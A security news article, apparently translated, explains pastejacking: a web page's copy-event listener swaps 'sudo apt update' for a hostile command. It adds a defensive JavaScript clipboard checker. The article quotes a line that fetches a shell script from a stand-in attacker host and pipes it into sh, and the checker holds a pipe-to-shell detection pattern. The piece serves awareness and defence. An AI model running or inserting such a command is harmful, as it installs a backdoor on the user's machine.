
Hacking: Copying and pasting commands from a web page can be very dangerous!

Programmers, system administrators, security researchers, and those who like to tweak their PCs have a habit of copying and pasting commonly used commands from a web page. But as the specialist Gabriel Friedlander reminds us, this practice is not without risk. Far from it.


Copy and paste is one of the most commonly used operations, whether by ordinary users, programmers, system administrators, IT security researchers or even those who like to tweak their PC. But Gabriel Friedlander, founder of the computer security training platform Wizer, would like to remind you that this practice is far from risk-free, especially when it comes to copying and pasting commands displayed on web pages.

Indeed, it is not uncommon for developers, novices as well as experienced, to copy and paste commonly used commands from a web page (StackOverflow for example) into their applications, into a Windows command prompt or into a Linux terminal.

But as Mr. Friedlander reminds us, there is a method that allows an attacker to modify the contents of your clipboard. Pastejacking, as it is called, consists of inserting malicious lines of code that are executed automatically when the user pastes the text into a terminal window. In a rather straightforward proof of concept posted on his personal blog, Mr. Friedlander asks readers to copy a command that most sysadmins and developers are familiar with: sudo apt update (editor's note: a command used to retrieve updated information about the software installed on your system).


Copy and paste can do a lot of damage

By copying and pasting this command into a text box or notepad, we see that the content is totally different. Indeed, the sudo apt update command has become curl http://attacker-domain:8000/shell.sh | sh. In reality, the deception lies in the JavaScript code hidden behind the HTML page of the proof of concept set up by Friedlander.

To put it simply, as soon as you copy the command “sudo apt update” contained in an HTML element, a malicious piece of code is executed. More precisely, it is a JavaScript event listener that captures the copy event and replaces the data in the clipboard with Mr. Friedlander's malicious code. “This is why you should never copy and paste commands directly into your terminal. […] It only takes a single line of code injected into the code you copied to create a backdoor in your application. This attack is very simple, but particularly effective”, he warns.
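A defender can check for this swap before anything reaches a terminal. The added example below (not code from Mr. Friedlander's proof of concept or from the source article) compares the text the user selected with what the clipboard actually holds and flags the signs of pastejacking described above. The function names are hypothetical, the trailing newline in the sample is constructed, and how the two strings are obtained (a browser extension, a clipboard wrapper) is left out.

```javascript
// Audit clipboard text before it is pasted into a terminal.
// visible   = the text the user selected on the page
// clipboard = the text the clipboard really contains after the copy
// auditClipboard and safeToPaste are hypothetical names for this example.
function auditClipboard(visible, clipboard) {
  const findings = [];
  const norm = (s) => s.replace(/\r\n?/g, '\n'); // unify line endings
  const seen = norm(visible).trim();
  const got = norm(clipboard);

  // 1. A copy-event listener replaced the selection with different text.
  if (got.trim() !== seen) findings.push('content-mismatch');

  // 2. A newline makes most terminals run the line as soon as it is pasted,
  //    leaving no chance to read it first.
  if (got.includes('\n')) findings.push('newline-autoexec');

  // 3. Control characters (ESC, backspace, ...) can hide or rewrite input.
  if (/[\x00-\x08\x0b-\x1f\x7f]/.test(got)) findings.push('control-chars');

  // 4. A download piped straight into a shell interpreter.
  if (/\b(curl|wget)\b[^\n|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b/.test(got)) {
    findings.push('pipe-to-shell');
  }
  return findings;
}

function safeToPaste(visible, clipboard) {
  return auditClipboard(visible, clipboard).length === 0;
}

// Constructed sample: the command shown on the page versus the replacement
// text quoted in the article (trailing newline added for illustration).
const shown = 'sudo apt update';
const swapped = 'curl http://attacker-domain:8000/shell.sh | sh\n';

console.log(auditClipboard(shown, swapped)); // three findings
console.log(safeToPaste(shown, shown));      // true
```

Pasting into a plain text editor first, as the article does, is the manual version of the same comparison.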

Source: BleepingComputer
